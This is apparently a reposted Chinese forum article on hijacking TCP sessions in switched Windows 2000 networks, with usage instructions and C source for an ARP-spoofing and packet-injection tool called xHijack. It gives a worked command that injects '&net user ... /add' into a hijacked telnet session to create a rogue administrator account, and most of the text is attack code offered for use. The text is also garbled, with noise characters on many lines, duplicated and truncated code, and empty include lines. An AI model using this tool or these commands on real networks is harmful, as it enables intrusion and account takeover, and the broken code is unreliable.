再谈交换环境下的会话劫持(For windows2000)

韩冰

第一步是开启IP Routing的功能，修改注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter为0x1，重启系统即可。
第二步是ARP欺骗，具体原理我就不说了。
第三步就是开始劫持啦。

7 l5 P  ^0 K* l  d- V5 P我写了个程序xHijack可以实现第二、三步功能，使用如下:

Usage: xHijack ServerSide ClientSide

下面根据三种不同的情况分别说明如何输入参数：
  k+ z$ x+ }( `7 i" {<1>服务器、客户端、劫持者处于同一局域网，接在同一交换机上（或交换机级连？）。
假如服务器的IP是192.168.0.2，客户端的IP是192.168.0.3，提供如下参数给xHijack即可
: a) k( K! a. O( k0 v! W" {* m" Sc:\>xHijack 192.168.0.2 192.168.0.3
; }  G( D' [* f! |' l劫持前数据流程：server <--> client
劫持后数据流程：server <--> hijacker <--> client

0 }# Y6 p* o& N, t5 H<2>服务器、劫持者处于同一局域网，客户端处于别的网络。
- g/ K/ b( @1 o假如服务器IP是202.202.202.2，服务器的网关是202.202.202.1，提供如下参数
xHijack 202.202.202.2 202.202.202.1
8 G9 c& r5 [5 D! Z* |9 L劫持前数据流程：server <--> gw <--> routes <--> client
劫持后数据流程：server <--> hijacker <--> gw <--> routes <--> client

<3>客户端、劫持者处于同一局域网，服务器处于别的网络。
+ Q4 \* o3 r" n$ v- @! R( a假如客户端的IP是192.168.0.2，网关是192.168.0.1，提供如下参数
xHijack 192.168.0.1 192.168.0.2
/ I3 l/ s) G9 f6 R8 \2 B+ K6 h劫持前数据流程：client <--> gw <--> routes <--> server
劫持后数据流程：client <--> hijacker <--> gw <--> routes <--> server

% n) D- {" |( b+ j( b0 Z输入两个参数后，会提示你选择网卡，然后会提示
l        <-- List all connections
r x       <-- Reset the number x connection
w x       <-- Watch the number x connection
! F7 \% h" i# u  I3 Ih x command   <-- Hijack the number x connection to execute command
6 x- ]9 p- A0 |  ]2 ~* t
: P9 I5 E, z6 d) [5 ]' Nlist、reset、watch命令我就不解释了。
* v" V- a0 h1 g4 w假如现在有如下连接
(1) 202.202.202.202:23 <--> 192.168.0.3:2345
0 c3 J- h; E- r7 V) W我们想要劫持这个连接运行我们的命令，输入
xHijack>h 1 "&net user ey4s hijack /add & net localgroup administrators ey4s /add"
为什么命令前面要加&呢？假如客户刚发送一个字符p过去，我们不加&的话，服务器端接受到的就是
9 I- |/ {5 @( x- f/ Z" wpnet user.....了，加了&后就成为p&net user.....，这样就不管前面客户输入了什么，我们的命令
都能够运行了。以上都假设服务器是windows 2000，unix下加什么字符，我不知道，我是unix白痴，呵呵。

劫持的流程如下：
<1>伪装成Server给Client发一个rst包
<2>伪装成Client给Server发了一个数据包
" m) i  \9 U+ s% X1 A! e; `<3>Server回一个ACK包给client
  `5 h  M6 ^, t7 `8 c) l6 z<4>因为Cleint的连接已经给我们reset掉了，所以client回一个rst包给server

这样的话，我们只能发一个伪造的包，但我想已经足够了。
想要一直劫持那个连接也可以，如下
<1>伪装成Server给Client发一个rst包
<2>欺骗Client，告诉它Server的MAC地址AAAAAAAAAAAA
<3>伪装成Client给Server发了一个数据包
<4>Server回一个ACK包给client
& o/ F% A# l( j3 d, M  c5 t<5>Client回一个rst包给Server，但Server收不到，因为Client发到AAAAAAAAAAAA了，呵呵。
<6>然后Server发给Client的包都由我们来处理，包括给Server回ACK包等等。

( s5 r3 ]& P1 Q, Y, ?" ^不过这样比较危险，在我们劫持的过程中，Client与Server的通讯始终是断开的。


刚开始看TCP/IP协议，调程序调得头昏脑涨，说明也写的乱七八糟，呵呵，程序代码也可能存在很多问题，
; t+ y# P( X. ~# O' x0 G) I还请各位多多指点。
( l) D+ c9 l; ?5 E& x( [
BTW:我没有空间，编译好的程序没地方放：（

( J( k1 A5 {$ n. G' J

+ }4 U- a3 H. @  }) e参考资料
: \# ]$ S3 b' b6 g' w+ x1 m<>交换环境下的会话劫持http://www.xfocus.net/article_view.php?id=375
<>交换网络中的嗅探和ARP欺骗http://www.xfocus.net/article_view.php?id=377
( U" q" H8 `( D2 m

# u8 H  m# u& D以下是程序代码
----------------------------------------------------------------------
/*-----------------------------------------------------------------------------
0 f$ g4 w3 z/ z6 HFile      : xHijack.c
Version      : 1.0
6 j% }; ?$ M) FCreate at    : 2002/8/12
Last modifed at  : 2002/8/19
1 X! ]. k, n8 l- V% [( X4 ZAuthor      : eyas
Email      : ey4s@21cn.com
; `! a3 z( d2 F6 C, s5 M  d7 QHomePage    : www.ey4s.org
感谢refdom和shotgun发布的源代码，使我获益非浅。
. A/ b, O6 B" Q5 I- r2 L- T8 z! eIf you modify the code, or add more functions, please email me a copy.

8 v! t& A, p: ?' z1 \" {; F2 M备注:
<>没有考虑IP头、TCP头超过20字节的情况
+ I& P/ O1 d; I; m. D<>没有考虑数据包分片的情况
: C) J2 V) V# ?: ?- S& x; S# K4 [$ A<>没有对截取到的TCP数据进行解码，如TELNET，虽然是明文传输，但是TCP数据里面包含了
, l" }5 h. j5 a  {显示格式、位置等信息，直接打印出来，显得很凌乱。但如果是IRC、SMTP、POP3等就没问
9 d( r. T3 K7 {  }# x题了。

也许下一版本会修正这些问题，也许不会有下一版本了。

-----------------------------------------------------------------------------*/
#include
3 j, I, k) d2 y; G3 {' Q/ E#include
#include
8 I8 b% r* U8 C/ p# H#include
#include
9 w/ U. O* u1 o+ C& b. r/ |: r2 Y#include
5 b  K' I5 J; F  y" Y#include
& U2 E" Q; ?  ^! f) J
; f' R6 P9 R6 }% N, ?#pragma comment (lib, "packet")
* Z& S) ?# I- {- r3 L- Z#pragma comment (lib, "iphlpapi")
#pragma comment (lib, "ws2_32")

#define Max_Num_Adapter 10
#define Max_Num_IPAddr  5
#define EPT_IP      0x0800      /* type: IP  */
& v# t+ @: ~0 |* e* ]: j/ `#define ARP_HARDWARE  0x0001      /* Dummy type for 802.3 frames */
7 j8 g; N/ ]/ `$ u4 B" F; `#define EPT_ARP      0x0806      /* type: ARP */
- r$ b4 o; p8 R! ?  E
$ s* `2 J& `5 ^$ X" s2 Y7 D! ~#define  ACTION_NONE    0
#define  ACTION_WATCH  1
#define  ACTION_RESET  2
#define ACTION_HIJACK  3
! i0 h$ s7 b* k; y5 K6 {
) b( s* j2 a0 \7 u) R' C' }9 e/*以1字节对齐*/
#pragma pack(1)
typedef struct _ehhdr
{
  unsigned char  DestMAC[6];
# V" j1 g5 Q* X& n3 C3 S8 h+ \6 N* I  unsigned char  SourceMAC[6];
+ t. d+ d' r# P& Y, w; m/ E  unsigned short  EthernetType;
; T3 A( D- C7 v}EHHDR, *PEHHDR;
& h8 I  p, r! W% l4 ?0 y
1 F5 t* y) e4 A- dtypedef struct _iphdr        //定义IP首部
{
  unsigned char h_verlen;      //4位首部长度,4位IP版本号
7 Q" ]# p! j6 P% d. w  unsigned char tos;        //8位服务类型TOS
; }# |( f. |$ G: T" T: z3 K  unsigned short total_len;    //16位总长度（字节）
  unsigned short ident;      //16位标识
7 R: a3 `+ j; B& V/ e  unsigned short frag_and_flags;  //3位标志位
  unsigned char ttl;        //8位生存时间 TTL
  unsigned char proto;      //8位协议 (TCP, UDP 或其他)
) a8 b8 m! |1 {  unsigned short checksum;    //16位IP首部校验和
  unsigned int sourceIP;      //32位源IP地址
  `% x0 A- a  J4 m3 [5 d  unsigned int destIP;      //32位目的IP地址
% \& H3 @* b4 \+ F) N( c}IPHDR, *PIPHDR;

typedef struct _tcphdr        //定义TCP首部
' ~4 s" z/ @( @3 U% U) P& n- {{
/ @+ q  l" h* ^+ S  USHORT th_sport;        //16位源端口
( q% Y2 @$ n7 c- {+ D  USHORT th_dport;        //16位目的端口
  unsigned int th_seq;      //32位序列号
  unsigned int th_ack;      //32位确认号
+ J8 ^' |5 R& S* x  d) G- B2 f% c  unsigned char th_lenres;    //4位首部长度/6位保留字
  unsigned char th_flag;      //6位标志位
. ~/ b3 W( W; d  USHORT th_win;          //16位窗口大小
" P5 S4 g! C2 h& Q" N  USHORT th_sum;          //16位校验和
  USHORT th_urp;          //16位紧急数据偏移量
9 a, d& U% {- W2 _+ U}TCPHDR, *PTCPHDR;
0 k7 l- Z+ E9 z4 x) S" z* V, z9 F& h; m
typedef struct _psdhdr        //定义TCP pseudo header
{               
1 j: f% X+ _& N3 R4 G  unsigned long saddr;
0 C$ F& t7 L# N  unsigned long daddr;
- r4 K% E; h- C" G- h  char mbz;
  char ptcl;
  unsigned short tcpl;
}PSDHDR, *PPSDHDR;
2 }( D) \" y0 w- a1 l
typedef struct _arphdr
# {" q( z' V5 ^{
% S  Z) n- a3 {1 o; [  unsigned short  HrdType;//硬件类型
' Q" }6 y& Q; Z* F+ z8 D5 E  unsigned short  ProType;//协议类型
: v1 c1 B) R6 N; `/ d% X! ^  unsigned char  HrdAddrlen;//硬件地址长度
  unsigned char  ProAddrLen;//协议地址长度
5 C* X  e9 R# f! s5 D9 f  unsigned short  op;//operation
8 T  s3 W' O* d7 A  unsigned char  SourceMAC[6];/* sender hardware address */
7 r* w, g( J) l0 @. V5 A+ S  unsigned long  SourceIP;/* sender protocol address */
  unsigned char  DestMAC[6];/* target hardware address */
  unsigned long  DestIP;/* target protocol address */
}ARPHDR, *PARPHDR;

typedef struct _ArpPacket
{
  EHHDR  ehhdr;
2 i5 E& M( o9 U0 z3 Q0 E- |5 l6 o  ARPHDR  arphdr;
- c% O0 G' K: |- Q. `% ^}ARPPACKET, *PARPPACKET;

9 K/ w- ]) F* g( d, ^typedef struct _tcppacket
{
$ A* u( v6 O* _/ ^3 O# k( W! ]  EHHDR  ehhdr;
( ?& R4 Y( Q' a9 l3 [  IPHDR  iphdr;
: J* P; |" t2 p2 V7 j6 X  TCPHDR  tcphdr;
}TCPPACKET, *PTCPPACKET;
2 B3 A8 |8 v2 H; L$ O! z! z) w  ~
. [- f2 N" P' ~* F, Ctypedef struct _conninfo
{
1 ~  m- L. t! s1 m  DWORD  dwServerIP;
7 W) f# B4 \  p' Y& @: u6 Y' w  USHORT  uServerPort;
' B, N  D0 k' |. a  DWORD  dwClientIP;
) J' h3 N- P7 p' T: B" W  USHORT  uClientPort;
; O! r$ ?/ x0 Y5 D1 |  F+ U  DWORD  ident;//标识
% E8 N6 K; O3 z3 T; Y! L  BOOL  bActive;
  struct  _conninfo  *Next;
9 a3 o! g$ g! C+ n3 X}CONNINFO, *PCONNINFO;

( e2 n$ U, T2 H  w/ i//定义全局变量

韩冰

unsigned int  g_ServerSideIP,
" r, G% g  X' q2 g- ?        g_ClientSideIP,
        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
, h/ ]! S' m4 Q0 `  M        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//本机MAC地址
0 f2 T( ^4 C; z' ^unsigned char  g_szClientSideMAC[6];
# A. R  \) N) e. Y$ Funsigned char  g_szServerSideMAC[6];
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
LPADAPTER    g_lpAdapter;
: v9 w4 q, a$ w" o# j! j+ B//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
; q  H2 r' F8 h/ _' m+ v- e$ h% BHANDLE      g_hThread[4];
7 j0 F  U6 e+ [, P9 M3 m/ kchar      g_szCommand[128];//command to execute after hijack
# _# m3 ~$ O9 j" V5 SDWORD      g_dwAction;//action type
DWORD      g_dwCtrlConn;//action 所控制连接的标识
DWORD      g_ident;//节点标识，递增
PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
        g_pConnHead = NULL,
7 Q: U4 v& W& z$ n3 L3 F0 P$ ?        g_pConnLast = NULL;
char      g_szSendPacketBuf[1514];
: G. a- q- Y% J: y' k" GLPPACKET    g_lpSendPacket;
7 Q* y- T1 `/ x7 h9 p//函数
void      usage(void);
* g% L/ x; F- S) S' K+ r. e  f* Yvoid      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
  T$ F8 I, r7 Pvoid      ListAllConnection();//列出当前所有的连接
8 `( S; Y! u0 x% E# R" [void      ResetActionAllFlag();
& ^4 K/ M# l  {- R/ dUSHORT      checksum(USHORT *, int);
- M2 n% }1 H" ]BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
BOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
LPADAPTER    InitAdapter();//初始化一些参数和全局变量
BOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
DWORD      GetConnNum(char *, DWORD, DWORD *);
DWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
* }: l, m; e7 bDWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
& z" w+ `- j2 t/ O- A9 g9 d! JDWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
DWORD  WINAPI  InterfaceThread(LPVOID);//
BOOL  WINAPI  CtrlEvent(DWORD);



int main(int argc, char **argv)
3 O  S7 f. ~$ R8 H; i- A{
! `& W' `" ]6 L  struct    bpf_stat stat;
  int      i;

  usage();
  if (argc != 3) return 0;
+ h! K: t2 M6 w+ ?/ m5 `  //取得参数
  g_ServerSideIP = inet_addr(argv[1]);
  g_ClientSideIP = inet_addr(argv[2]);
  //初始化adapter & 一些全局变量
  g_lpAdapter = InitAdapter();
  if(!g_lpAdapter) return 0;
  //get ServerSide MAC & ClientSide MAC
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
7 n! R  M, Q. d7 Z( ~( {  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
  //create arp spoof thread     
  i = 1;
! N+ l) c* D: Z0 E  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  Sleep(500);
  i = 2;
  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  //create analyse packet thread
  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
, Z3 s" e6 T, D' {* Z  //create interface thread
  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
$ K5 s+ |4 E$ o* B, P  //set console ctrl handle
  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
  {
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
6 O& W! u- a# N    return 0;
9 s4 H5 c* B" l+ p1 p  }
  //wait for any thread exit
  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
    printf("Warning: unable to get stats from the kernel!\n");
# G) q* A6 H( |2 N. n8 e+ A  else
    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
  //free resource   
  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
  return 0;
  ^& V( _/ N1 z! G4 t, X}

$ U8 V& R! U/ e//
//功能：重置所有于ACTION有关的标志
//

韩冰

unsigned int  g_ServerSideIP,
0 [8 o( S, y5 u! ~8 Z        g_ClientSideIP,
. E5 _+ l, b( g; d+ Y$ v/ F        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//本机MAC地址
! G, N) d; Z0 J+ }unsigned char  g_szClientSideMAC[6];
unsigned char  g_szServerSideMAC[6];
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
; q, k* V9 `  M  ~0 a+ o$ TLPADAPTER    g_lpAdapter;
! U. V: e) _% w//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
HANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
& [$ }" Z/ x; ]% D+ aDWORD      g_dwAction;//action type
DWORD      g_dwCtrlConn;//action 所控制连接的标识
DWORD      g_ident;//节点标识，递增
, Y+ `3 Y/ N4 a" R9 U8 d" }PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
; _* r, H4 C8 Y* c1 M        g_pConnHead = NULL,
        g_pConnLast = NULL;
char      g_szSendPacketBuf[1514];
3 m4 U8 {7 K# C+ l4 NLPPACKET    g_lpSendPacket;
% [8 {1 }- t7 P* S6 z" f//函数
9 n) Q8 o9 C* p( S( wvoid      usage(void);
void      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
void      ListAllConnection();//列出当前所有的连接
- J' i! e0 W1 Z. q1 P4 l' wvoid      ResetActionAllFlag();
1 G# z; D. R2 F( E3 M4 _9 PUSHORT      checksum(USHORT *, int);
BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
BOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
LPADAPTER    InitAdapter();//初始化一些参数和全局变量
3 O  F" \# a) |. B3 U1 OBOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
' I* ?3 e6 N  g& uDWORD      GetConnNum(char *, DWORD, DWORD *);
4 t7 }3 z7 C! t4 n# i( DDWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
; v3 J' ]' t9 }; J6 C4 x' Q- TDWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
2 A( G! y# q& p; f0 ~% O6 K" DDWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
% z- a- [* d% I+ VDWORD  WINAPI  InterfaceThread(LPVOID);//
3 @2 H# o9 N! {1 ], s3 ]/ q& S0 Z* [/ cBOOL  WINAPI  CtrlEvent(DWORD);
% [3 ?5 ^; ?/ ?9 M
: ?- v! _4 ?, m6 t! F
9 g5 H3 F0 `9 G6 k% N
- }+ _1 t2 H1 ]7 H5 A" l; D  ?int main(int argc, char **argv)
{
  struct    bpf_stat stat;
, W- _% K5 q( A7 S  ]6 M  int      i;

  usage();
& Z  h$ s9 A7 w; _# ~" I  if (argc != 3) return 0;
  //取得参数
7 ~8 F; j+ B  K: [6 }; A" e2 g  g_ServerSideIP = inet_addr(argv[1]);
  g_ClientSideIP = inet_addr(argv[2]);
  //初始化adapter & 一些全局变量
) q9 c- o4 i4 p' l+ ?7 X  g_lpAdapter = InitAdapter();
  if(!g_lpAdapter) return 0;
: o- S/ d! P/ p7 @1 H% O  //get ServerSide MAC & ClientSide MAC
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
5 @- ?' h' a- B7 B# s/ O2 c4 z% ^% S; s  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
- ~/ S/ J& A6 I  //create arp spoof thread     
  i = 1;
  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
7 Q  \2 M: S/ f! T; a2 D- a  Sleep(500);
  i = 2;
  w& l" g# L3 v$ {, ^' M  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  //create analyse packet thread
! {. B8 T5 e' v3 l' Q' T  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
  //create interface thread
1 F# w# N* b# ?6 t: E. d  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
  //set console ctrl handle
  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
  {
3 p( J0 D, s; r6 A, u) S1 E; f    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
    return 0;
  }
) l9 I5 E  Q$ i0 ]8 z  //wait for any thread exit
, ?$ K) R, L0 W! Y* l  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
& o; v, _  ?0 d2 K$ i- M  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
    printf("Warning: unable to get stats from the kernel!\n");
  else
    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
  //free resource   
  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
2 ^( B( \, W4 }- x% ~  return 0;
}

& v  t4 t+ N  L5 Z//
% H) t' o! l  d2 |//功能：重置所有于ACTION有关的标志
& D+ d+ u0 W) g. c5 M1 A//

韩冰

void ResetActionAllFlag()
{
" T6 `3 k4 X3 ~0 |, H) i/ b  g_dwCtrlConn = 0;
  g_pCurrCtrlConn = NULL;
  g_dwAction = ACTION_NONE;
/ B" ]# @  x; k3 q}

* L8 D3 u$ N" A3 ?//
% _  s" @% }* o; M! h+ M//功能：处理Ctrl+C和Ctrl+Break事件
/ S0 B8 r/ a4 h  w//
3 d( s3 c( H( w. L; f/ TBOOL WINAPI CtrlEvent(DWORD dwCtrlType)
' d: _6 C6 m0 Z4 \! o{
5 K0 M) g" N" [8 Y, o# k* |/ t  switch(dwCtrlType)
  {
' P; f% t& Q3 |, I3 N. T1 P    case CTRL_BREAK_EVENT:
* P% ~& Q% w+ E2 y; t9 o      //reset action all flag
      ResetActionAllFlag();
      break;
    case CTRL_C_EVENT:
6 ^/ g+ [+ R& W/ _, i* M# O+ w      //terminate all thread
      TerminateThread(g_hThread[0], 0);
& r' b/ T# @/ b7 o! U7 V      TerminateThread(g_hThread[1], 0);
" C9 E0 O* J, L3 T      TerminateThread(g_hThread[2], 0);
      TerminateThread(g_hThread[3], 0);
      break;
    default:
      break;
  }
& q3 c7 @1 B5 n  B9 X+ m  return TRUE;
}
6 L+ j- L1 N' T4 B) x0 d
" J8 G6 e& W  n* R+ K//
//功能：处理用户输入
//
DWORD GetConnNum(char *szStr, DWORD dwLen, DWORD *lpCommandPos)
{
' q, f8 t8 a, s4 z. O! r7 V; y  DWORD  i;
4 @: R& \  p. l% ?' z. p  char  szBuff[16];
& C/ X& g$ E7 o( R
1 ^) t* N% f1 q8 \* F6 E7 m' j  *lpCommandPos = 0;
  for(i=0; i<15, i代码比较乱
: x: @% `" R! q& O1 y) x  a//
2 ]& R1 k$ a' Z5 g/ F2 R1 KDWORD WINAPI InterfaceThread(LPVOID lp)
{
" {) X6 ]! H3 w9 q: O. a, D  char  szHelp[] =  "l\t\t<-- List all connections\n"
            "r x\t\t<-- Reset the number x connection\n"
4 W: h! U, w% s            "w x\t\t<-- Watch the number x connection\n"
% N, q' t  x" k. k            "h x command\t<-- Hijack the number x connection to execute command\n"
2 Z$ L7 O% D( P- u/ t            "[Note]\n"
            "Ctrl+Break to clear all action\n"
* A, E3 ]/ k+ O            "Ctrl+C to exit\n";
  char  szPrompt[] = "\nxHijack>";
. ^0 U- m# t3 e* f0 F" F  char  szBuffer[128];
( I' ?' C! @+ L4 \  DWORD  dwPos;
" E/ @( Y& I* D+ {8 Z5 B% A  PCONNINFO  pTmp;
: x5 D* u* N' b/ Z
7 n; I; y! R& @: {  while(1)
  {
    gets(szBuffer);//不考虑buffer overflow
) I2 ~  K/ ?& i) T    switch(szBuffer[0])
    {
      case 'l':
      case 'L':
        ListAllConnection();
        break;
/ F; Y+ G$ X$ }* I, ^2 }9 k6 W- K      case 'r':
1 T. h+ r* ~" d; |0 Q, V! T      case 'R':
: m1 o( d, ?7 D0 h2 ?" N        if(strlen(szBuffer) >2)
        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
( ~7 G6 G8 R+ f          g_dwAction = ACTION_RESET;
        }
        else printf("%s", szHelp);
$ q  O$ c% [- _) m$ X  Z        break;
      case 'w':
      case 'W':
6 j9 n) y5 p4 U4 M% Z6 t        if(strlen(szBuffer) > 2)
        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_WATCH;
        }
, y; f: o% H$ A        else printf("%s", szHelp);
        break;
      case 'h':
      case 'H'://h 1 xxx
5 h8 L) g; Z& x! `; e" v        if(strlen(szBuffer) > 5)
        {
) T! B2 k/ ^4 n) U8 F0 S( \2 x. m          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          //如果command第一个字符是'或"
          if( (szBuffer[2+dwPos+1] == '\'') || (szBuffer[2+dwPos+1] == '\"') )
4 Q1 @! e& p& Q# Y0 W# H/ Z          {
            strncpy(g_szCommand, &szBuffer[2+dwPos+1+1], sizeof(g_szCommand) - 3);
- v8 m! d) U2 O& {% v$ Q5 B            g_szCommand[strlen(g_szCommand) - 1] = 0x0;//去掉最后一个'或"
9 s+ M5 I+ O. d9 N; k5 J. t: s+ E( Y          }
          else strncpy(g_szCommand, &szBuffer[2+dwPos+1], sizeof(g_szCommand) - 3);
          strcat(g_szCommand, "\x0D\x0A");
          g_dwAction = ACTION_HIJACK;
7 v6 H+ |$ y4 C1 y        }
4 R1 P( }6 `: w; N8 t        else printf("%s", szHelp);
        break;
      default:
* K0 G6 C7 n( V; s) u0 z        printf("%s", szHelp);
        break;
6 ~7 N  m4 p" _% W% f( d    }//end of switch
    //find the specify ident's struct point
5 i9 L7 l6 l0 j4 _    if( (g_dwCtrlConn) && (g_dwAction) )
    {
      g_pCurrCtrlConn = NULL;
4 _! ~( G: m& }% c      pTmp = g_pConnHead;
% ^) ~7 V2 a" v1 \1 n- a      while(pTmp)
5 r' l) y! f; _% }1 ?7 Y      {
        if((pTmp->ident == g_dwCtrlConn) && (pTmp->bActive) )
9 g6 b  j# N2 h6 b( e4 @        {
          g_pCurrCtrlConn = pTmp;
) z+ y! I! B4 \; X+ u. o" o- d" g          break;
' T' c9 u* k/ v' ~) e        }
" j( i8 Y4 `5 X6 R0 S0 A8 h        pTmp = pTmp->Next;
      }
      if(!g_pCurrCtrlConn)
/ u. U0 g0 y/ O      {
5 d! R! u/ U6 ~        printf("Can't find the number %d connection.\n", g_dwCtrlConn);
        //reset action all flag
; |- Z" c$ x# C        ResetActionAllFlag();      
: b8 |6 {+ H5 q7 i9 @. b      }
0 Q. f: y8 y; ]6 M" Y" y( ~" n    }
    if(!g_dwCtrlConn) ResetActionAllFlag();
" M# W3 x8 p8 j5 @1 T, K1 Z, l    //显示当前用户所期望的动作
* ], [$ h( T( k  M    printf("\nCurrentAction:");
* [; H+ k5 T8 S$ p! ~    switch(g_dwAction)
    {
      case ACTION_WATCH:
        printf("ACTION_WATCH");
        break;
! E( S. F, i1 ^6 H, j; G: x4 g      case ACTION_RESET:
        printf("ACTION_RESET");
        break;
- Y& G7 \1 }. Z' b      case ACTION_HIJACK:
        printf("ACTION_HIJACK");
        break;
      default:
        printf("ACTION_NONE");
8 T# G* B1 M; V5 z, I        break;
    }
3 P. c1 e/ Q4 s' |& p/ f    printf("\tCurrentCtrlConn:%d%s", g_dwCtrlConn, szPrompt);
( _  X) P8 x2 U2 ~. w6 F4 m, Y  }//enf of while
$ f# b8 T8 y: p' s8 K& V  return 0;
/ Q2 S) ?, J0 b6 e6 p8 U3 ~; L}

韩冰

// 1 R4 [- ~0 x" H; _# x//功能：列出当前所有连接 ) C! {0 [% I& m5 _/ d8 D// void ListAllConnection() { : J7 f% s7 L" |. D7 }1 V PCONNINFO pTmp; SOCKADDR_IN saDest, saSource; pTmp = g_pConnHead; 7 `; n8 x! N0 ~2 o; V4 p while(pTmp) ; f' u2 I8 H# _9 n# s { ) Q* c$ P3 U' D if(pTmp->bActive) { ; _3 Y" E8 z! r3 E. B$ T saSource.sin_addr.s_addr = pTmp->dwServerIP; ) M$ ~9 y# k7 ?0 I) n saDest.sin_addr.s_addr = pTmp->dwClientIP; ( R9 B) d6 D# S& w4 l printf("(%d) %s:%d <--> ", pTmp->ident, inet_ntoa(saSource.sin_addr), ntohs(pTmp->uServerPort)); ( V% n, x- r& U/ _ printf("%s:%d\n", inet_ntoa(saDest.sin_addr), ntohs(pTmp->uClientPort)); : {7 \& {5 f" u) g: F/ K: R } pTmp = pTmp->Next; } } // //功能：初始化一些数据，取得指定网卡的MAC地址和所有IP地址 // LPADAPTER InitAdapter() { : i) E E5 W6 Y5 J+ X LPADAPTER lpAdapter; static char AdapterList[Max_Num_Adapter][1024]; 0 B, `* m8 `: d+ j char szSelectAdapterName[512]; 7 T6 \" w9 n6 o1 U WCHAR AdapterName[2048]; 9 Q6 t- O0 P1 ?5 r# P; U m$ w WCHAR *temp,*temp1; ULONG AdapterLength = 1024; , v7 \# a( |! K, o4 q int iAdapterNum = 0; int iRetCode, i; 6 n5 a* e+ R0 a8 V. i2 a int iAdapter = 0; # \4 Q. u; o4 Q* k) h ULONG ulLen = 0; DWORD dwRet; ' w7 M3 a! n0 Y% r PIP_ADAPTER_INFO pAdapterInfo = NULL, pTmp; 6 R& e' K% ^* F+ N2 x PIP_ADDR_STRING pIPAddr; h- v) E1 N, m- b: a0 P //Get The list of Adapter if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE) { & q$ K5 L c! i9 r; T6 X& e printf("Unable to retrieve the list of the adapters!\n"); return 0; 9 ~5 X3 `5 s; n } ) k3 ~5 n7 C! F) }; f; d) B temp = temp1 = AdapterName; 0 g; y' x; W3 d/ E* ]# | i = 0; while ((*temp != '\0')||(*(temp-1) != '\0')) { ) i. m9 ]9 z/ k4 K/ |2 K if (*temp == '\0') { memcpy(AdapterList,temp1,(temp-temp1)*2); ' H( q- @/ B: M9 l& p printf("%d - %S\n", i+1, AdapterList); - \- x& G& l% t$ z% J e/ G temp1=temp+1; i++; / O3 S( G0 P) T8 u } & K: N3 t9 y! a& M) U) o. \, y. Z* l temp++; } * X' b" m4 f) L //choose adapter while((iAdapter <= 0) || (iAdapter > i)) % p2 O2 l. ^. N { printf("\nPlease choose your Adapter:"); : e( L- g! U) ~; k- g. i scanf("%1d", &iAdapter); } printf("\n"); //---------------------------------------------// 5 }6 @# P! A; q! U* ~" K 